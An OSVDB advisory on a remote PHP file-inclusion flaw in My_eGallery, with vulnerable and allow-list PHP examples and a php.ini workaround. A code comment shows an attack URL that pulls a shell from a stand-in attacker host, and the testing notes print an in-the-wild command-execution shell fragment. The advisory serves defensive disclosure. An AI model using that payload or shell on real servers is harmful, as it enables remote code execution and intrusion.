My_eGallery Arbitrary File Inclusion

2003-11-26T08:37:00
ID OSVDB:2867
Type osvdb
Reporter OSVDB
Modified 2003-11-26T08:37:00

Description

Vulnerability Description

My_eGallery contains a flaw that allows a remote PHP include attack. This flaw exists because the application does not validate parameters used in include statements. This allows a user to send a specially crafted URL request that specifies a malicious file from a remote system, which could execute arbitrary code on the vulnerable system.

Technical Description

Certain PHP files used by My_eGallery pass request parameters straight into include functions without filtering them. An attacker can set such a parameter to a URL pointing at arbitrary PHP code hosted on a different web server; the vulnerable script fetches and executes that code with the privileges of the web server process (typically the web server's service account, not root).
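The following is an added illustration of the include pattern described above and of its hardened counterpart. It is not My_eGallery's own code; the parameter names (`basepath`, `page`) and the file layout are assumptions chosen for the example.

```php
<?php
// Added example, not code from My_eGallery. Parameter names and file
// layout are assumptions made for illustration.

// VULNERABLE pattern: the include path is built from request input.
// With register_globals=On, $basepath is populated straight from the
// query string, and with allow_url_fopen=On (PHP 4) include() will
// fetch a remote URL and execute the response as PHP. A request such as
//   ?basepath=http://attacker.example/shell.gif%3F&cmd=id
// makes the script include http://attacker.example/shell.gif?config.php
// (the appended "?" turns the hard-coded suffix into a query string),
// and the shell then runs "id" on the web server.
function vulnerable_include($basepath)
{
    include($basepath . 'config.php');
}

// HARDENED pattern: request data never reaches include(). A short
// request token is mapped onto a fixed allow-list of local files, so
// neither a remote URL nor a ../ traversal string can be included.
function safe_include(string $page): bool
{
    $allowed = [
        'config'  => __DIR__ . '/config.php',
        'display' => __DIR__ . '/display.php',
    ];
    if (!array_key_exists($page, $allowed)) {
        return false;               // unknown token: refuse, do not guess
    }
    $path = $allowed[$page];
    if (!is_file($path)) {
        return false;               // file missing: fail closed
    }
    include $path;
    return true;
}

// Read the token from $_GET explicitly instead of relying on
// register_globals, and refuse anything not on the allow-list.
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'display';
if (!safe_include($page)) {
    http_response_code(400);
    echo 'invalid page';
}
```

The allow-list is the important part: validating the string (for example rejecting `http://`) is fragile, because `ftp://`, `php://` and `data:` wrappers and path traversal all need separate handling, whereas a lookup table simply has no way to reach a file the developer did not list.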

Also of note is that PHP-Nuke can use My_eGallery as a module and is susceptible to this vulnerability as well. However, the My_eGallery author does not support the PHP-Nuke integration (see the second Vendor Specific Advisory URL). A fix for the PHP-Nuke module has been developed externally (see the Generic Informational URL).

Solution Description

Upgrade to version 3.1.1g or higher, or apply the vendor-provided patch; both have been reported to fix this vulnerability. As a workaround, the flaw can also be mitigated by disabling the 'allow_url_fopen' and 'register_globals' PHP directives: the former stops include() from fetching files over HTTP or FTP, and the latter stops query-string parameters from being turned into the variables that the include statements use. Note that this workaround may adversely affect other PHP applications on the same server that depend on either directive.
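The workaround expressed as php.ini settings, shown here as an added example rather than a vendor-supplied configuration. The weak values are the PHP 4 defaults of the time; the corrected values are what the advisory recommends. On PHP 5.2 and later, include() of remote URLs is governed separately by allow_url_include, so that directive is listed as well.

```ini
; Weak configuration (PHP 4 era defaults): request parameters become
; global variables, and include() will happily fetch http:// URLs.
; register_globals = On
; allow_url_fopen  = On

; Corrected configuration per the advisory's workaround.
register_globals = Off
allow_url_fopen  = Off

; PHP >= 5.2 only: allow_url_fopen no longer controls include()/require();
; keep this Off as well (it is Off by default on those versions).
allow_url_include = Off
```

Check the effective values with `php -i | grep -E 'register_globals|allow_url'` or phpinfo() after restarting the web server, since a per-directory or per-vhost override can silently re-enable them.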

Short Description

My_eGallery contains a flaw that allows a remote PHP include attack. This flaw exists because the application does not validate parameters used in include statements. This allows a user to send a specially crafted URL request that specifies a malicious file from a remote system, which could execute arbitrary code on the vulnerable system.

Manual Testing Notes

Example exploit code that has been seen in the wild is available (see the Generic Exploit URL under References). The fragment below is the remote file that the attacker hosts under a .gif, .jpg or .txt extension and points the unfiltered include parameter at; it relies on register_globals to populate $chdir and $cmd from the query string. execute() and print_output() are not defined in the fragment as published.

```php
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
// $chdir and $cmd arrive from the query string via register_globals
if (isset($chdir)) @chdir($chdir);
ob_start();
// run the attacker's command, capturing stdout and stderr via a temp file
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
```

References:

Vendor Specific Solution URL: http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5
Vendor Specific Advisory URL:
Vendor Specific Advisory URL:
Secunia Advisory ID: 10301
Nessus Plugin ID: 11931
ISS X-Force ID: 13853
Generic Informational URL: http://ruleit.co.uk/nuke/modules.php?name=News&new_topic=7
Generic Exploit URL: http://packetstormsecurity.nl/0311-exploits/myegallery.txt
Bugtraq ID: 9113